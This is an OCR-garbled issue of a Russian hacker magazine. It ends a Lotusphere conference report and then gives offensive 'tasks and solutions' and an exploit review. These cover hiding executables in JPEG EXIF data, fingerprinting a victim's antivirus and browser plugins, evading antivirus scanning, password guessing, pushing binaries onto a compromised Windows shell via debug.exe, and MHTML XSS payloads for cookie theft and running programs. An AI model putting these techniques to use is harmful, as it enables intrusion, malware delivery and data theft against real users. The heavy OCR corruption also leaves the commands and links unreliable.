то, что в английском языке называется «соііабогаііоп», то есть 
«взаимодействие». Все крутится вокруг людей; обсуждается, как 
повысить эффективность работы организации. Когда смотришь на 
то, с каким упоением докладчики рассказывают о новых способах 
эффективной совместной работы, невольно вспоминаешь образ 
самого обычного российского предприятия. Телефон, е-таіі и (в 
лучшем случае) корпоративный мессенджер по-прежнему остают- 
ся единственными средствами коммуникации. Все так же, как и 
десять лет назад! Искренне хочется силой посадить руководите- 
лей таких компаний и показать им, как сейчас, в 201 1 году, выгля- 
дят инструменты для эффективной работы предприятия. Решения, 
которые изначально были разработаны для продуктивной коллек- 
тивной работы, а не просто как способ передачи информации. 
Рассказывая об общих подходах, мы намеренно не углубляемся в 
описание конкретных нововведений платформы І_оІиз, огромное 









Асйѵйу Зігеат — заново изобретенный ІпЬох в виде 
ленты социальных событий 



количество которых было представлено на конференции. Все-таки 
это очень специфично. Но нельзя не упомянуть ту инновационную 
составляющую, без которой не обходится их реализация. Взять 
хотя бы анонсированную систему автоматического выставления 
приоритетов поступающим сообщениям. Да-да, приложение само 
определяет, какое письмо является важным, а какое, вероятнее 
всего, вообще не стоит читать. И это работает! Причем в основе 
лежат наработки ІВМ ѴѴаІзоп — нашумевшей системы от ІВМ, 
способной понимать человеческую речь и, используя базу зна- 
ний, отвечать на поставленные вопросы. В прародителе нашего 
ТВ-проекта «Своя игра» в США она сумела обыграть самых опыт- 
ных игроков. И вот теперь схожие интеллектуальные алгоритмы 
используются для ранжирования важности писем. 

ІВМ и создает, и поддерживает тренды одновременно. С учетом 
распространения мобильных устройств, было бы странно, если 
бы компания не подводила свои продукты для использования 
где угодно. Поэтому важным направлением в развитии І_оІиз 
является реализация мобильности. Компания поставила перед 
собой цель сделать свои решения доступными на современных 
мобильных платформах: іРЬопе/іРасІ, АпбгоісІ и ВІаскЬеггу (к 
слову, вице-президент РІМ показал со сцены разрабатываемый 
сейчас планшетник Ріау Воок). Другой тренд — веб-приложения 
и облачные вычисления. И тут опять же сюрприз: І_оІиз Эутрбопу 
(тот самый офисный пакет от ІВМ, которому мы устраивали бета- 
тестирования) отныне доступен в качестве одного из сервисов 
І_оІиз І_іѵе — облачной платформы, которая появилась в прошлом 
году. Новый инструмент позволит создавать документы и работать 
с ними, используя один лишь браузер. Попробовать его в дей- 
ствии можно прямо сейчас: [оЩзІіѵе.сот/еп/зѵтрЬопѵ . 

І_оІизрЬеге — это не просто конференция. Это умопомрачительная 
тусовка самых разных людей, которые объединены общей целью 
— сделать компании более эффективными. И у них это получает- 
ся. Поэтому, как гласит девиз мероприятия, 

Ве зосіаі. йо Визіпезз. т 
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■ ■ Алексей «бгеепйод» Тюрин (адгггсіодгадтаіі.сот) 





ЗАДАЧА: СПРЯТАТЬ ЛЮБОЙ ФАЙЛ В 
^ЕО'Е. 



РЕШЕНИЕ: 

Давноуже руки чесались написать что-нибудь про стеганографию. 

Как нам сообщает ѴѴікіресІіа, стеганография — это наука о скрытой 
передаче информации путем сохранения втайне самого факта пере- 
дачи. Например, невидимые чернила — это один из классических 
методов стеганографии. Втой же Вики написано, что можно писать 
молоком (какЛенин), а с помощью огня проявлять текст. У меня моло- 
ка не было, только сгущенка. Попробовал — не получилось. Сгущенка 
палится, видать метод ненадежный... Лучше съесть :). 

Но мы живем в XXI веке, и технологии требуется использовать соответ- 
ствующие. Некто Антуан Санто опубликовал недавно небольшую рабо- 
ту по поводу скрытия любых файлов в ] р е д ’ а х (бі.раскеізіогппзесигііу. 
пеі/рарегз/депега 1/ЕтЬесІсІіпд_ЫсІсІеп_і : іІе5_іп_]ред_апсІ_аЬи5е5.рсІ1 : ). 
В общем-то, ничего нового он не открыл, но зато все четко и последо- 
вательно описал :). Суть метода, который использовал Антуан, заклю- 
чается в том, что мы можем хранить/прятать любое количество данных 
в ехТ-заголовках]ред-файлов. Ехіб — это стандарт, позволяющий 
добавлять кизображениям и прочим медиафайлам дополнительную 
информацию (метаданные], комментирующую этотфайл, описываю- 
щую условия и способы его получения, авторство и та к далее. В общем, 
метаданные. Все современные фотоаппараты добавляют та кую инфу 
к фоткам, а многие принтеры используют ее для корректной печати. 

Мы же эти заголовки используем для своих целей. Автор заюзал для 
своихэкспериментов какой-то Ііпих. Для начала поступим аналогично. 
Возьмем любую фотку — ІезіДрд, и файл, который хотим спрятать — еѵіі. 
ехе. Для начала посмотрим содержимое ехТ-заголовков нашего ]ред’а: 



ехі-РіооІБ іѳбі:. др§ 

Здесь ехіііооіз — стандартная тулза для работы с ехіГ Главная особен- 
ность ехіб — количество хранимых данных не ограничено. Единствен- 
ное ограничение — текстовый формат. Отсюда и решение — конверти- 
руем наш еѵіі. ехе в Вазе64. 



ииепсосіе -т еѵіі. ехе еѵіі. ехе > еѵіі.іхі 

Здесь ииепсобе — тулза для работы с конвертацией; -т — указываем, 
что конвертируем в Вазе64. 

Теперь добавим полученный файл в ехТ-за головок файла ІезіДрд. 



ехіТіооІ -Соттепі: "<=" еѵіі.іхі іѳбі. др§ 




еѵіі.ехе в Ва$е64 в поле Соттепі 

Теперь если ты запустишь ехіііооіз іезі^рд, то обнаружишь изменения 
в заголовках — см. скриншот. 

Таким образом, мы все спрятали. Изображение при этом никакие из- 
менилось. Разве что размер файла увеличился. 

Конечно, метод лайтовый, и задетектить его просто. Но самое инте- 
ресное заключается втом, что мы можем залить этот файл в альбом на 
[асебоок или на іііскг! Вообще говоря, мы можем залить и файлы, в 
которых использовались даже более крутые средства стеганографии 
(инфу прячутвсамом изображении), но на всехонлайн-сервисах 
графические файлы проходят предобработку и содержимое меняет- 
ся. Но это не касается ехТ-заголовков! Только Вконтакте эта тема не 
работает — там имеет место полная обработка изображения. 

Для декодирования и получения еѵіі.ехе из нашепДред’а намтре- 
буется выполнить следующую последовательность. Качаем фотку с 
фэйсбука, а далее: 

сісі іТ=іез1:_-Ргот_РВ.др§ о-Р=іе5І:_-Ргот_РВ. иие Ьб= 1 5кір=24 

Где б б — стандартная тулза для конвертации и копирования файлов; 

Г — из какого файла; о[ — в какой файл; Ь5=1 — размер блока 1 байт; 
зкір=24 — пропустить первые 24 байта (заголовок]ред). 

Таким образом, мы получим в Іе5І_1топп_ГВ.иие только текстовые 
строки, то есть наш еѵіі.ехе в Вазе64. Далее декодируем строку об- 
разно в ехе-файл: 



Где: иибесобе іе5І:_-Ргот_РВ. иие 

• -Соттепі — указываем имя поля, куда добавить данные; 

• "<=" еѵіі .іхі — добавить данные из файла еѵіі. Іхі. Вторым плюсом этого метода является его простота. Пример 
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приведен для *піх’ов, ното же самое можно сделать и в ѴѴіп, только 
потребуется больше работать ручками. Например: 

1. Заходим в свойства ]ре§. 

2. Открываем вкладку "Подробно" (это и есть ехі-р) . 

3. Изменяем любое поле на заметную строку. 



4. Открываем ]'ре§ в каком-либо редакторе. 

5. Ищем заметную строку. 

6. Вставляем вместо нее файл в Вазе64. 

Для конвертации файлов в Вазе64 можно воспользоваться любым 
онлайн-сервисом. 




ЗАДАЧА: ПРОВЕРИТЬ «АААЛВАРЬ» НА 
ДЕТЕКТИРУЕМОСТЬ, ИЛИ ЗАМЕНА VI- 
ВІІЗТОТАІ.. 



РЕШЕНИЕ: 

Да, антивирей развелось видимо-невидимо! Они теперь фактически 
входят в стандартный комплект ПО любого ПК. И чтобы кого-то за- 
разить (естественно, в ознакомительных целях), нам приходится эти 
антивири обходить. 

На самом деле, если действовать по всем правилам, то желательно 
знать, что у жертвы за антивирь, да и вообще «характеристики» систе- 
мы — ОС, фаера итакдалее. Тогда можно будет накатить на вируталке 
аналогичную, максимально сэмулированную систему и протестить 
всю атаку, чтобы она потом прошла, как по маслу. 

Самым простым способом определения точной версии антивиря 
является, наверное, электронная почта. Нам требуется, чтобы наша 
жертва что-нибудь нам написала. Фишка втом, что большинство 
антивирусов проверяет какотсылаемую.таки присылаемую почту, 
добавляя в поле «Х-Апііѵігиз-Зіаіиз:» заголовка письма запись о 
том, что письмо проверено. А в поле «Х-Апбѵігиз:» указывается, с 
использованием какого антивируса проводилась проверка. Иногда 
прописывается даже версия антивируса и дата апдейта базы, что, 
безусловно, важно. Кстати, аналогичным образом можно узнать о 
применении спам-фильтра (поле «Х-зрат») и использованном для 
отправки почты ПО (поле «Х-Маііег»). Примеры на скриншотах. 

Но чаще получается, что наша цель«анонимна» и имеетнеизвестный 
антивирь. Приходится обходить все. Но поставить даже десять основ- 
ных экземпляров на виртуалки — дело накладное и муторное. Потому 
мы воспользуемся онлайн-сервисами. 

Кстати, здесь под «малварью» давай понимать что-то более обшир- 
ное. Пусть это будут как всякие вири.таки хакерские тулзы. Ведь даже 
с безобидным пеісаі’ом были проблемы из-за детектов. 

Итак, в ходе поисков нашлась следующая группа онлайн-сервисов: 



• ѵігиБІоІіаІ.сот; 

• ѵігизсбіе-Р. сот; 

• ІіІІегЬіІ: . сот; 



• ѵіг5сап.ог§; 

• ѵіги55сап.]о1:1:і.ог§; 

• зсаппег. ѵігиз.ог§; 

• ѵзсап . поѵігизІФапкБ .ог§; 

• е-апТіѵігиБ . сот. 

Основной же «проблемой» большинства сервисов является то, 
что итоги их работы попадают в антивирусные компании. То есть 
запихнем мытуда подозрительный бинарник, который покамест 
палится лишь частью антивирусов — и тем, которые не спалили файл, 
будет отправлен соответствующий отчет. Таким образом, через неко- 
торое время и остальные антивирусы добавят сигнатуры в свои базы. 
Но на самом деле не всетакстрашно. Отчетов в антивирусные ком- 
пании отсылается много, обрабатываются они медленно, а многое и 
вовсе отбрасывается. 

Крометого, у большинства перечисленных сервисов есть галка в 
стиле «І\Іо сІізІгіЬиІе», которая предполагает, что файлы/результаты 
не будут никуда отправляться. Но на античате ( Фгит.апбсбаТги/ 
ІбгеасІпаѵ32269-1 -1 0.ЫтІ ) есть старый пост, говорящий об обратном. 
Типа, такие файлы наоборот подвергаются более тщательной про- 
верке. Вместе с тем, в сети нашлась еще парочка онлайн-сервисов, 
которые утверждают, что никуда ничего не отправляют, но они плат- 
ные (недорого). 

• мігагсі-сііескег . сот; 

• ѵігіезі:. сот. 



Ргои: -ІЩСДІ 0КШГГ 

ггдг (Пе Пеэіс от : Кг. Ьисаі Вгони 
□а!«: 1 Б ГеЬ 2011 21:55:10 +01Ш 

НІНЕ'Ѵігііоп: І.в 

ісхі/рійіп; 

сьаг 5М * н VI пйееті- 1 251* 

Х-Ргісгиуі Э 

Х-НВД|Ы>г1ог1*у: тгтші 

Х~ті 1 шг-- Нісі^50« ОиПп&к Ь.ВВ. 260В .ІШвВ 

Х-ГІіггеСІЕ: РгегіиоеЛ Ву иімОІЕ ѴВ, ВО. 2*00.0305 

В«Е 

К-5РІИІ $РАК 

Письмо из папки «Спам». Мэйлер — М5 ОиНоок Ехргезз 



Письмо из папки «Спам». Антивирус — Аѵа$і 



5иЬ]есі: ааа 
МІМЕ-Ѵегаіоп г 1.0 

Сопіепі-Туре : іехі/ріаіп; с На г$е1“іѵі пйома -1251 
Сопіепі-Тгапа^ег-Епсосііпе; риоІесІ-ргіпІаЫе 

Х-Апііѵігиа: аѵааі! (ѴР5 110218- 1, 19.02.2011), ОиІЬоипй теаааее 
Х-Ап1іѵігиБ~51а1:и5: Сіеап 
Х-5рат: N01 йеіесіесі 
Х-Нгаз: Ок 
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ЗАДАЧА: ПЕРЕБОР ПАРОЛЕЙ ПО- 
УМНОМУ 

РЕШЕНИЕ: 

Я уже не раз описывал тему перебора аутентификационных данных 
втом или ином контексте, не пропущу и сегодня. Такая информация 
важна, так как это распространенная уязвимость, актуальная для 
самых разных систем, которые в итоге очень просто эксплуатиро- 
вать. В подтверждение этому — доклад Дмитрия Евтеева (Розіііѵе 
Тесбпоіодіез) — рІ5есигіІѵ.ги/сІоѵѵп[оасІ/РТ-Ме1:гіс5-Ра55ѵѵогсІ5-2009. 
р бЕ В нем представлена большая и хорошая статистика по россий- 
ским компаниям. Документ не очень новый, но все равно актуаль- 
ный. По нему становится ясно, как перебирать пароли и куда идти с 
ними дальше :). В качестве бонуса — разнообразные словари самых 




распространенных паролей с привязкой к ресурсам можно почерп- 
нуть тут: 

• 5ки1І5есигі1:у .ог§/ыікі/іпсІех. рІір/Ра55ыопсІ5; 

• сіеѵііееѵ . Ыо^зроі: . сот/2Ѳ10/Ѳ1/ыеак-ра55ыогсІ5 . ІгЬтІ . 

В заключение — мотаем на ус самые распространенные пароли «в 
среднем по больнице»: 

• 123456 (+\- 2 символа); 

• (2мег1:у; 

• аЬс123; 

• ра55ыогсІ; 

• название_сервиса; 

• имя_пользователя. 




ЗАДАЧА: ЗАКАЧКА БИНАРНЫХ 
ФАЙЛОВ ЖЕРТВЕ (ВІЫ2НЕХ) 



РЕШЕНИЕ: 

Достаточно распространенная ситуация, когда ломаешьѵѵіп-системы 
(хотя и под піх’ами бывает) и понимаешь, что шелл есть, а сделать с 
ним ничего нельзя. Это связано в основном с ограниченностью кон- 
сольного ПО винды, а также с наличием всяких файерволов. В общем, 
задача классическая: закачать файлик«через консоль». 

Для этого можно воспользоваться старым добрым методом — через 
беЬид.ехе. ОеЬид — это стандартная программа-отладчик в ѴѴіпсІоѵѵз, 
которую используют для проверки и отладки выполняемых файлов. 
Метод чем-то похож на описанный выше стеганографический. Для 
начала мы конвертируем наш ехе-файл в Ьех (шестнадцатиричный 
формат). Но не просто в хеке, а в специально отформатированный 
хеке. Подав его на «вход»сІеЬид’у, мы на выходе получим полноцен- 
ный ехе’шник. 

Чтобы соблюсти это специальное форматирование, воспользуемся 
сторонним продуктом — РазіТгаск’ом или каким-нибудь другим (в 



Сети их целый пучок). 

РазіТгаск — это еще одно ответвление/фронт-энд к Меіазріоіі’у. За 
ним уже не особо следят, потому есть проблемы в работе, хотя он все 
равно включен в ВаскТгаск П2. Нуда ладно, кделу. 

1. Запускаем Разі: Тгаск. 

2. Выбираем "Віпагу Нех Рауіоасі Сопѵегѣег" . 

3. Прописываем путь к ехе-файлу., который необходимо 
конвертировать. 

В итоге мы получим последовательность есбо, которую и потребуется 
ввести в консольжертве. Понятно, что вводить вручную — безумно. 
Но автоматизация, как понимаешь, зависит от ситуации. Пример 
профессиональный и применим к продукту от Сіігіх (с использова- 
нием протокола ВОР). В общем, все было бы просто и элегантно, но 
есть большой минус: ограничение на размер создаваемого файла, 
а именно — 64 Кб. Это очень мало. Мы можем залить тотже пеісаі 
(например, его старую версию весом 60 Кб) или какой-нибудь легкий 
шелл-код из Меіазріоіі’а, но ппеіегргеіегуже великоват. Тем не 
менее, это ограничение можно обойти. Как? Сначала небольшое 



ехе-конвертер в аеЬид-виде 



^5 


гоп^Вй. /ар^гп^Ы^рІсіЦут^З/^іі^хрІаІЫт^І - ^ЬнІІ - Когі'лОІц 




1 5СІІІОП Ест 


VI с» вооктагКі 5егапд5 неір 




ГИШ: 


іѵіаіріоііз/г.ііз/оаів/еурі ліь/ .яц'.# 1з 




№ 

гооівЬі : (И/ 


# С0І Іі7Ь 
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е 2с10 Ос кел^еЕЗМ Ш еейо е бй >- кешеЕЭН еейо е 2сІЭ 32 » кетгеЕЗЧ ш еейо е 2с10 12 » КеятеОіч и е 
ейо е 2ес -іѳ » КсшпеЕЗМ еейо е 2с I 42 КетгіеЕЗН ссйо е зоо до 26 » КсітеЕЗН 5А еейо е 308 48 » КстпеЕ 
Щ есію ч Ш К » КетшйЕЗІЧ И- еейо ч 30ч В Ъ >=■ КегапеЕЗН И- еейо е 315 24 21 » КчяпеЕЗМ № еейо ч 314 № 56 

» 64 кСЙО Ч 31В 51 Кепіпр'ЕЗМ ІЛ е*СЙ0 Ч 31-С 5) Ке^лиіе?РЗМ 64 Е?ёйи пн 31 1 56 » Кні-пшн-ЕЗМ 64 еСЙО Ч 36 

0 із зз 04 » кшіеЕЗЫ іа еегю е ье » кетп-еьзм іа есію е 25В ѳі » кшіеым іа еспо е 255 и » кетпеЕЗМ іа 
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отступление. Вышеописанный метод очень часто используется для 
загрузки файлов на сервер через захваченный М550Б-сервер, 
используя процедуру хр_стсІ5Ьеи (данная процедура позволяет 
выполнять команды ОС из СУБД). Потому и способ обхода отчасти 
«привязан» к М55СБ. Его первое описание было сделано на ОеЮоп 
1 6 в 2008 году компанией Бесигезіаіе ( бе^соп.огд/ітадез/бе^соп-І 6/ 
сісі б-ргезепіаііопз/беісоп-І 6-рапеІ-Ыаск ѵз уѵЫіе.рбД . Описанную в 
документе тулзу было непросто найти, так как на нее уже давно забили 
[ ЬирзУ/тебіа.беісоп.огд/бс-І б/іооіз/за ехріоііег.гаг ]. Суть способа 
тоже вполне проста — мы сначала закачиваем ехе’шник-конвертер, 
некий аналогсІеЬид.ехе.только со снятыми ограничениями на размер 
файла. Апотом пользуемся им для создания больших файлов потому 
же алгоритму, что и с беЬид’ом. 

Ксожалению, мне неудалось найти в сети конкретного описания, 
как работает данный конвертер (похоже, на гугле меня забанили). Но 
все не такуж плохо. В Меіазріоіі’е есть модуль, который реализует 
загрузку больших файлов через М550Б, как раз используя конвертер 
(методе ОеЮоп’а). Описание и исходный код в простейшем для пор- 
ти рования виде (в новых версиях М5Р он усложнился) можно взять 
на о^епзіѵе-зесигіІу.сот/теІазрІоіІ-ипІеазЬесІ/ТЬе Сиіз Вебіпб ІТ 



Для ВаскТгаск’а 4 путь к файлу-конвертеру лежит в /орі/теІазрІоііЗ/ 
тзІ'З/сІаІа/ехрІоіІз/тзздІ. Файл (Ь2Ь) уже находится в Ьех-виде для 
беЬид’а. Таким образом, нам остается залитьего, используя тот или 
иной способ, в файл (например, сопѵегіег.ітр): 

Создаем ехе-шник: 
беЬи§ < сопѵегѣег Лтр 

Переименовываем с правильным расширением: 
тоѵе сопѵегѣег. Ьіп сопѵег1:ег.ехе 

Далее мы можем закачиватьлюбые другие ехе-файлы. Здесьтакже 
потребуется автоматизация. При этом «закачка» происходит просто 
в Ьех-виде. Последний шаг— конвертировать Ьех-файл в ехе. Он 
создастся стем же именем, что и файл на входе: 

сопѵепііеп.ехе еѵі1_ф1е_1іех.1:х1: 

Напоследок расскажу об очередном минусе данного метода — в 
последних версиях ѴѴіпсІоѵѵз отсутствует б еЬид.ехе. В каких именно — 
вопрос (в ѴѴі п 7 файлаточно нет). 



ЗАДАЧА: ОПРЕДЕЛЕНИЕ ВЕРСИЙ 
ПЛАГИНОВ БРАУЗЕРА, ИСПОЛЬЗУЯ 
МѴА5СКІРТ. 

РЕШЕНИЕ: 

Браузеры уже давно являются одной из основных целей, одним из 
главных мест для проникновения и захвата систем. Оно и понятно. 
Интернет — это наше все, а браузер — основное средство для взаи- 
модействия. Ввиду разнообразия применяемых в Сети технологий 
одного браузера не хватает, и к нему ставятся плагины. 

Классический набор: бІазЬ , рсіб геасіег, ]аѵа. И каждый из плагиновдо- 
бавляет новый вектор атаки. Понятно, что в разных версиях браузе- 
ров/плагинов свои собственныеуязвимости, и эксплуатация их часто 
различна, а потому необходимо точно определить версию ПО перед 
ата кой. 

Предположим, мы подсунули нашей жертве ссылку на наш сайт. 
Практически 1 00%, что при заходе на него в ЫТр-за головке будет 
передана точная версия браузера в поле «ІІБег-АдепІ». Но инфор- 
мацию о плагинах мы можем получить, только используя баѵаЗсгірТ 
Можно было бы показать несколько лайтовых примеров отом, как 
получить версию плагина, но, во-первых, их легко найти в сети, а во- 
вторых, они не особо юзабельны, так как взаимодействие с плагина- 
ми в ІЕ происходит посредством соответствующих АсбѵеХ- эле ментов, 
а в других браузерах — напрямую с плагинами. 

Таким образом, код под различные браузеры — разный. В-третьих, 
крометого, что плагин установлен, он должен быть включен (епаЫеб). 
В-четвертых — зачем изобретать велосипед? Есть несколько «детек- 
торов», многие из которых входят в стандартные веб-фрэймворки. 
Мне по нраву ріпІабу.пеі/РІидіпРеІесІ: . который написал Зрик Гердс. 
Детектор определяет версию баѵа, ОиіскТіппе, РІазЬ, ЗЬоскѵѵаѵе, 
ЗіІѵегІідЫ:, атакже версии различных РОР-ридеров и еще нескольких 
плагинов. То есть, основныетемы, через которые ломают. Ктомуже 
можно дописать детект других плагинов по аналогии. На сайте есть 
подробное описание работы и возможность настроить детектор под 
себя. В итоге мы получаем с сайта ]аѵазсгі р1;-фа йл рІидіпбеІесфБ. 




А йѵг схяпірідо оГгісІсеІісш иііЬ РІи^ІііЙЕ-ІесІ 

Нме К» Іич ммлрИ р4и^1Л у«н іТюиИ Юок И ап- 

{ЭиккТЕш* 

ЗпіоМ I- «иЬЫ Йім 1 
Ѵетякі пиС 

ОшскТіліс ѵ«=:ѵп й -*■- Я е: по[ вніэІЫ гааЬВД 

Втоитет сю рІіуОтлсІгТітпг VI {игащ ршскТсѵ рЗирп) йк 

В:0\А”ЬЙ еш р^ОиісІгТіЛН: ѴіД» {и ОД ОйтіЬіТшіг Фі 3-гіЗ ]Ш(у рііііін! (Л Нс 

ОечГУЕ Эр^ігіілп 

ЬиШЬЗ А иШ Тйк 
Ѵсгікит ьий 

ЩѵіП'К. пді югапел «- ѣаі ги'&кй 
П*1І| 

ЗвіоІІсі к шЬН Епѵ 

Ѵввяіг ГО Я 1, 102,0 

Ниѣ 5, о, л .в м и ашийѣй ий «гаы&а, 

БЬасілгіѵе В^ЕКіІба 

ЭпшіМ к сшЫпА Мк 

Ѵпякі сгС 



Минимум плагинов — залог здоровья? 



Подпихиваем его на наш сайт: 



кзсгірі: ^уре^Чех'Ь/іаѵаБегір'Ь" 5гс="р1и§іпбе1:ес-Щ 6 б"> 

</зсгір1:> 

И получаем версию АбоЬе Реабег, например: 

ѵаг геабег_ѵег5Іоп = РІибіпОеІіесІі.беІіѴепБІопС'АбоЬеКеабег"); 

Точность определения зависит от некоторыхусловий, но чаще всего 
мы получаем четырехциферную версию плагина. Подробности 
методов определения и ограничений ищи на вышеуказанном сайте. 
Также в детекте есть еще несколько полезных функций, которые 
можно использовать и для благих целей. 




ЗАДАЧА: СДЕЛАТЬ ЖУРНАЛ ][ ЛУЧШЕ! 

РЕШЕНИЕ: 

Все просто — . Вступай в фокус-группу и излагай свои мысли и пожелания по материалам журнала. Могу 

тебя уверить, что многие авторы читают отзывы читателей, реагируют на них. Так что это реально действенный способ 
изменить что-то клучшему. 
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свежие 
уязвимости 



ЕХРЮІТ5 

ПЕѴІЕѴѴ 



<РК! 

І/ІЕѴѴ 



Приветствую тебя, читатель! Вот мы и снова встретились на стра- 
ницах ][. Сегодняшний обзор эксплойтов порадует тебя целым 
ворохом свежайших уязвимостей в самых разнообразных про- 
граммных продуктах. Запасайся терпением и внимательно следи за 
описанием всех представленных багов, чтобы самому не повторять 
смешных ошибок наших дражайших девелоперов. 



МЕЖСАЙТОВЫЙ СКРИПТИНГ В 
МІСРОБОРГ ѴУ/ІЫРОѴѴБ МНТМІ. 

[іШЭ 

Нетакдавно китайские хакеры снова обнаружили эпохальный 
зиродей, скрывающийся в многострадальной винде. На этот раз под 
раздачу попал обработчикфайлов МНТМІ_(МІМЕ Епсарзиіаііоп оР 
Аддгедаіе НТМІ_) в ІЕ. Уязвимость существует из-за ошибки в способе 
обработки хэндлером протокола МНТМІ_ МІМЕ-форматированных 
запросов для блоковданных внутри документа. Злоумышленниклегко 
может внедрить в архив страницы вредоносный скрипт, который и 
будетзапущен при попытке просмотра файла. Итог — сбор пользова- 
тельской информации, подмена веб-страницы итакдалее. 

МііШі 

Рассмотрим оригинальные способы эксплуатации данного бага от 
команды 80 ѵи[.сот . 

1.Х55с помощьюзагрузки тЬРтІ-файла. 

Если используется обработчик протокола МНТМЦ расширение и 
Сопіепі-Туре файла полностью игнорируются. Таким образом, злоу- 
мышлении к сможет переименовать тЫт 1-скрипт со злонамеренным 
Х55-КОДОМ во что-нибудь безобидное вроде *дрд. После этого нехи- 
трого действия уже специально подготовленный файл заливается на 
нужный нам сервер (например, с помощью формы загрузки фотогра- 
фий) и скармливается пользователю посредством Ыті-странички 
на другом (также специально подготовленном) сайте с примерно 
следующим содержимым: 

кіТпате 5гс="МНТМІ_ : Рі1:1:р : //1:аг§е1:-5І1:е . сот/ирбіе/ 
сіето. ІтРтІ ! соокіе"х/і-Ргате> 

С помощью описанного алгоритма пользователь нужного сайта рас- 
кроет тебе свои кукисы и другую конфиденциальную информацию с 
этого сайта при посещении твоего злонамеренного домена. Причем 
сам этого не заметит. 

Для обхода возможных проверок, встроенных в форму аплоада, 
китайцы предлагают склейку нормальной картинки с нашим зло- 



намеренным файлом. Это делается с помощью нехитрой виндовой 
команды: сору/Ь Ідрд + І.тЫтІ 2дрд. 

2. СРІ_Р/Х55-инъекция в МНТМІ_-файле. 

Все МНТМІ_ построены с помощью СРІ_Е (перевода строки). Таким 
образом, если мы сможем внедрить символы СРІ_Е (а значит, и про- 
извольные скрипты), то нужный нам сайт с легкостью может быть 
ата кован. 

В качестве примера авторы предлагают длинный іРгате-код, посмо- 
треть который ты сможешь в оригинальном асіѵізогу. 

В целом же данный подвид МНТМІ_-инъекций направлен на формат 
05ОЫ, так как некоторые сайты для предотвращения Х55 проверяют 
заголовок Сопіепі-Туре в таких файлах. 

3. Обход заголовка Х-РРАМЕ-0РТІ0М5. 

Для начала давай выясним, что же это за хитрый заголовок. 

Итак, веб-разработчики могут посылать вместе с Ыт 1-страница ми 
специальный гезропзе-заголовок, называемый Х-Егате-Орііопз, 
который ограничивает набор способов для отрисовки страницы. 
Если Х-Егате-Орііопз содержит маркер 0ЕІ\ІѴ, ІЕ будет препятство- 
вать визуализации страницы, содержащейся в пределах фрейма. 
Если он содержит маркер 5АМЕ0РІѲІІМ, ІЕ будет блокировать визуа- 
лизацию только в том случае, если точка отсчета координат для 
просматриваемого содержимого страницы верхнего уровня будет 
отличаться отточки отсчета контента, прописанной в директиве 
Х-Егате-Орііопз. 

В целом же введение данного заголовка призвано помочь в деле 
предотвращения СІісЮаскіпд-атак. 

Китайцы предлагают следующий способ обхода этого заголовка с 
помощью протокола МНТМІ_: 

сі-Ргате 5гс="тІі1:т1 : ІгЬ'Ьр : / / ѵіѵм . 80ѵи1 . сот/шІтРтІ/іі . рбр ! соокіе" > 
</і-Ргате> 

сі-Ргате 5гс="1і1:1:р : / / ѵіѵіѵі . 80ѵи1 . сот/тІгРтІ/іі . рбр" > 

</і-Ргате> 

4. Локальная Х55-инъекция спомощью МНТМІ_ + РіІе://ипсраІН + 
АсІоЬе Реас1ег9. 

В конце 2010 года некий хакер Билли «ВК» Риос предложил крайне 
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Запуск саІс.ехе с помощью ЛЛНТМІ. 



интересный способ кражи локальных файлов І бИр://аоо.аІ/ктВХВ І. 

В этом способе использовался метод «Эсгірі зге Іо Іосаі біез іп 
бае І_осаІІ_о\л/ бігесіогу» вкупе с протоколом бііе://, специальным 
65-сценарием и прогой АбоЬе Реабег. 

Если же использовать нашу багу в МНТМЦ то этот метод чтения 
локальных файлов крайне упрощается. Для тестов авторы предлага- 
ют тебе свою готовую утилиту, расположенную по адресу ЫірУ/доо. 
дІ/рСУЗР (тестировалось на ѵѵіп2кЗ+іе8+АбоЬе Реабег 9). 

5. Локальная Х55-инъекция с помощью МНТМІ_ + йІе:///ипсра*Ь + М5 
ѴѴогб. 

Демонстрация данного способа расположена тут: 80ѵи[.сот/тЫ:ппІ/ 
ѵѵогб.бос . Качаем документ, сохраняем его как сЛѵѵогб.бос, открыва- 
ем и видим содержимое файла сДЬооЕіпі. 

Этот способ базируется на баге Місгозоб: ѴѴогб іаѵазегірі: ехесибоп 

[ Ьир://доо.д1./90К1\І\л/ І. Как был приготовлен РоС, содержащийся в 
файле ѵѵогб.бос, читай ниже. 

а. Создаем обычный Ыті-файл и вставляем в него следующий Х55- 

КОД: 

сІіітІхОВЗЕСТ с1а55Іб=с1зіб : ае24-Рбае-03с6-11б1-8Ь76- 
ѲѲ80с744-Р389храгат пате=иг1 ѵа1ие=Іііір://млм.80ѵи1. 
сот/Ііаск§ате/ыогб . Іі1:т></ОВЗЕСТ> 
ааааа 



плуатации уязвимостей в МНТМІ_. Но сначала ты должен вспомнить 
о древнем баге, обнаруженном хакером бгеЬид9 [ ЫірУ/доо.ді/ 
ЕРРоЭ ): 

<ОВЗЕСТ СІ_А55Ю=СІ_5І0: 12345678-1234-4321-1234-11111111 
1111 ССЮЕВА5Е=с : /міппі/5у5і:ет32/са1с . ехех/ОВЗЕСТ> 

Этот баг позволяет тебе выполнять любую программу в зоне «Мой 
компьютер» и работает на Іе6/іе7/іе8 + ѵѵіп2к/\л/іпхр/\л/іп2кЗ. 

Для эксплуатации этого чуда в контексте МНТМІ_ты должен повто- 
рить шаги, описанные в предыдущем пункте, заменив хзз- и тЫтІ- 
коды на следующие: 

кІгІтІхОВЗЕСТ с1а55Іб=сІ5Іб : ае24-Рбае-03с6-11б1-8Ь76- 
0080с744-Р389храпат пате=иг1 ѵа1ие=тІі1:т1 :1й1е : //с : / 
ыогб .бос ! соокіех/ОВЗЕСТ> 
ааааа 



/* 

Сопіепі-Туре: тиііірагіі/геіаііеб; Ьоипбагу="_Ьоипбагу 
Ьу_теге" : 



b. Открываем этот файл в М5 ѴѴогб и сохраняем как сЛѵѵогб.хтІ. 

c. Открываем сЛѵѵогб.хтІ с помощью обычного блокнота и инжектим 
тЫтІ-код втег <\л/*Л>ааааа<Ал/:1>: 



- -_Ьоипбагу_Ьу_тепе 
Соп1:еп1:-І_оса1:іоп : соокіе 
Соп1:еп1:-Тгап5-Реп-Епсобіп§: Ьазеб4 



/* 

Сопіепі-Туре: тиііірагі/геіаіеб; Ьоипбагу="_Ьоипбагу_Ьу_ 
тепе" : 

- -_Ьоипбагу_Ьу_теге 
Сопіепі-Іосаііоп : соокіе 
Сопіеп1:-Тгап5-Рег-Епсобіп§: Ьаве64 

РСЗѵ2Нк+Оро8с2МуаХВ0ІНМуУ20паНК0сОоѵІЗбЗбу44МН21ЬС5дЬ2 
